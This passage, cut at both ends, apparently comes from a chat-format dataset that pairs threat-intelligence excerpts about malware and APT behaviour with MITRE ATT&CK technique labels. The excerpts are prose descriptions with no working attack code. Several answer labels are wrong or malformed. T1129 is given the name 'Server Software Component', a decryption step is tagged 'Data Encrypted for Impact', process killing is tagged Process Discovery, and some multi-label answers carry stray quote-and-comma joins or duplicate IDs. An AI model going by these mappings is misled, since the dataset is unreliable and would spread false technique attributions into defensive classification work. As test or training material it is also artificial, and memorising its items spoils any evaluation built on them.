- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Of note, we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon. Cannon uses SMTPS and POP3S as its C2 channel compared to Zebrocy that uses a more commonly observed HTTP or HTTPS based C2. Add the layer of encryption that the SMTPS and POP3S protocols provide to the legitimate web-based service and you have a very difficult C2 channel to block"
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can uninstall malware components using a batch script. Additionally, a malicious Word document used for delivery uses VBA macros for execution."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bonadan has maliciously altered the OpenSSH binary on targeted systems to create a backdoor."
- },
- {
- "role": "assistant",
- "content": "T1554 - Compromise Host Software Binary"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "copies itself to the Startup folder to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ComRAT has used a task name associated with Windows SQM Consolidator."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkWatchman has been observed deleting its original launcher after installation."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can scan for open TCP ports on the target network."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp has removed various hooks before installing the trojan or bootkit to evade sandbox analysis or other analysis software."
- },
- {
- "role": "assistant",
- "content": "T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar gathers information on the system and local drives."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WannaCry attempts to copy itself to remote computers after gaining access via an SMB exploit."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used cmd.exe to launch commands on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has monitored critical processes to ensure resiliency."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. ObliqueRAT has been linked to the Transparent Tribe APT group in the past"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The command does not attempt to kill the specific Office process that would load the particular delivery document, such as Excel in the case of this “.xlam” file, but instead attempts to kill processes associated with Word, Excel, PowerPoint and Publisher"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The analysis of the tools and techniques used in the Astaroth campaign show how truly effective LOLbins are at evading antivirus products"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla can collect account information from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can leverage its implementation of Mimikatz to obtain and use golden tickets."
- },
- {
- "role": "assistant",
- "content": "T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers used both families concurrently from late last year through November 2017 and there is some C2 infrastructure overlap between the two families, as well as links to historical reporting. Reaver Malware Analysis To date, Palo Alto Networks Unit 42 has identified 10 unique samples and three distinct variants of a new malware family we have named “Reaver”. As such, we identify each variant as Reaver.v1, Reaver.v2, and Reaver.v3. Reaver.v1 has been observed delivering a payload that uses HTTP for network communication, while versions 2 and 3 use a payload that uses raw TCP connections for this communication. The flow for Reaver is as shown"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols', 'T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SslMM contains a feature to manipulate process privileges and tokens."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used a compromised account to create a scheduled task on a system."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes using PowerShell and can also perform pass-the-ticket and use Lazagne for harvesting credentials."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT has checked for the existence of a Service key to determine if it has already been installed on the system."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JHUHUGIT uses a .bat file to execute a .dll."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HiddenWasp uses an RC4-like algorithm with an already computed PRGA generated key-stream for network communication."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses PowerShell for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SilverTerrier uses HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrifeWater can collect data from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This hardens the encryption of the network communication, as a single RC4 key will not decrypt the entire payload. Leverages existing Windows registry key that is enabled by default in Windows 10 to store configuration data. Generates unique session keys for each connection to the C2 server. Employs polymorphic code, changing its runtime footprint during code execution to thwart memory analysis and evade signaturing. Encrypts or decrypts function blocks (code blocks) during runtime, as needed, to evade detection. Uses position independent code (PIC) to throw off static analysis tools"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kasidet can execute commands using cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tasklist can be used to enumerate security software currently running on a system by process name of known products."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The file named ‘lsass.exe’ was downloaded from win10-update[.]com via an HTTP request. The win10-update[.]com domain has been noted in open source as an indicator associated with Chafer threat operations. The lsass.exe file downloaded from this domain is a previously unreported python-based payload that we are currently tracking as MechaFlounder. We believe Chafer uses MechaFlounder as a secondary payload that the group downloads from a first-stage payload to carry out its post-exploitation activities on the compromised host"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM has exfiltrated data to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As seen in the above request, the Trojan will generate a URL for its beacon with the following structure:http:///chk? The Trojan will issue a request to this URL to check (hence the chk string in the URL) to see if the C2 server has a command for the Trojan to run"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This can potentially bypass application whitelisting since all processes spawned during the attack are legitimate Microsoft executables"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling has the ability to set its file attributes to hidden."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has modified the firewall using netsh."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor can perform a long sleep (greater than or equal to 3 minutes) to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After Comnie has been copied to the %TEMP% directory, it will look for the presence of the ‘DQuit.tmp’ file in this path"
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page."
- },
- {
- "role": "assistant",
- "content": "T1185 - Browser Session Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DownPaper communicates to its C2 server over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes commands remotely via cmd.exe."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Later, the attackers are observed executing an HTA file hosted on a remote server by abusing mshta.exe via depended.exe. The Mshta utility can execute Microsoft HTML Application (HTA) files and can be abused to bypass application control solutions. Since mshta.exe executes outside of Internet Explorer's security context, it also bypasses browser security settings"
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lateral movement can be done with Net through \"net use\" commands to connect to the on remote systems."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The generated buffer is encoded using the BASE64 alphabet to be sent in the POST request"
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "hides any strings related to its own indicators of compromise."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has the ability to execute a process using \"runas\"."
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If no exceptions occur, the Windows executable drops a DLL file in the user's AppData\\Local\\Temp\\ directory, creates a randomly-named folder under C:\\ProgramData\\ directory and moves the DLL under that folder as a random file name. This Redaman DLL is made persistent through a scheduled Windows task with the following properties"
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT can load DLLs into memory."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany can monitor the titles of open windows to identify specific keywords."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "11 AV detection If there is no Avast install present, the script proceeds to the final .dll execution using regsvr32 and quits"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sys10 collects the local IP address of the victim and sends it to the C2."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoisonIvy creates a backdoor through which remote attackers can steal system information."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cannon can download a payload for execution."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used the \"Get-AcceptedDomain\" PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell. They also used AdFind to enumerate domains and to discover trust between federated domains."
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware has created scheduled tasks to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first of FIN7's new tools is BOOSTWRITE – an in-memory-only dropper that decrypts embedded payloads using an encryption key retrieved from a remote server at runtime. FIN7 has been observed making small changes to this malware family using multiple methods to avoid traditional antivirus detection, including a BOOSTWRITE sample where the dropper was signed by a valid Certificate Authority. While CARBANAK has been thoroughly analyzed and has been used maliciously by several financial attackers including FIN7, RDFSNIFFER is a newly-identified tool recovered by Mandiant investigators"
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FoggyWeb's loader can check for the FoggyWeb backdoor .pri file on a compromised AD FS server."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For instance, the following data exists within a resource: fb 70 b0 c9 bd c5 8a d4 0c 54 fd 4c 6d bb f0 0f By multiplying each byte with -1, we obtain the following data: 05 90 50 37 43 3b 76 2c f4 ac 03 b4 93 45 10 f1 After using RC4 and the key 14331d289e737093994395d3fc412afc, the following cleartext data appears: \\x00\\x00\\x00\\x00FlashRun.vbs We do not see the payload using this FlashRun.vbs filename, instead it uses a temporary file name to store an embedded VBScript file, such as %Temp%\\4.tmp\\5.vbs"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading', 'T1064 - Scripting', 'T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession has the ability to drop additional files to an infected machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CARROTBAT itself is a dropper that allows an attacker to drop and open an embedded decoy file, followed by the execution of a command that will download and run a payload on the targeted machine"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Given Lazarus’ use of a wide array of tools and techniques in their operations, it’s reasonable to assume that the group will continue to use ever-evolving tactics in their malicious activities. Overall, an organization will need multilayered security strategies, as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It will: Download and execute the backdoor component Replace the content of the downloader Mach-O executable with a decoy, either using a base64-encoded embedded file or by downloading it from the internet Open a decoy document (described later) Close the Terminal window that just opened The decoy document replaces the downloader Mach-O file, which means the malicious executable is only present in the ZIP file now"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has made registry modifications to alter its behavior upon execution."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Web shells to maintain access to victim websites."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has used malware to collect information on files and directories."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT creates a scheduled task to ensure it is re-executed everyday."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum can establish persistence by creating a .lnk shortcut to itself in the Startup folder."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In a recent wave of attacks during February 2019, Elfin attempted to exploit a known vulnerability (CVE-2018-20250) in WinRAR, the widely used file archiving and compression utility capable of creating self-extracting archive files. The exploit was used against one target in the chemical sector in Saudi Arabia. If successfully exploited on an unpatched computer, the vulnerability could permit an attacker to install any file on the computer, which effectively permits code execution on the targeted computer"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kobalos decrypts strings right after the initial communication, but before the authentication process."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
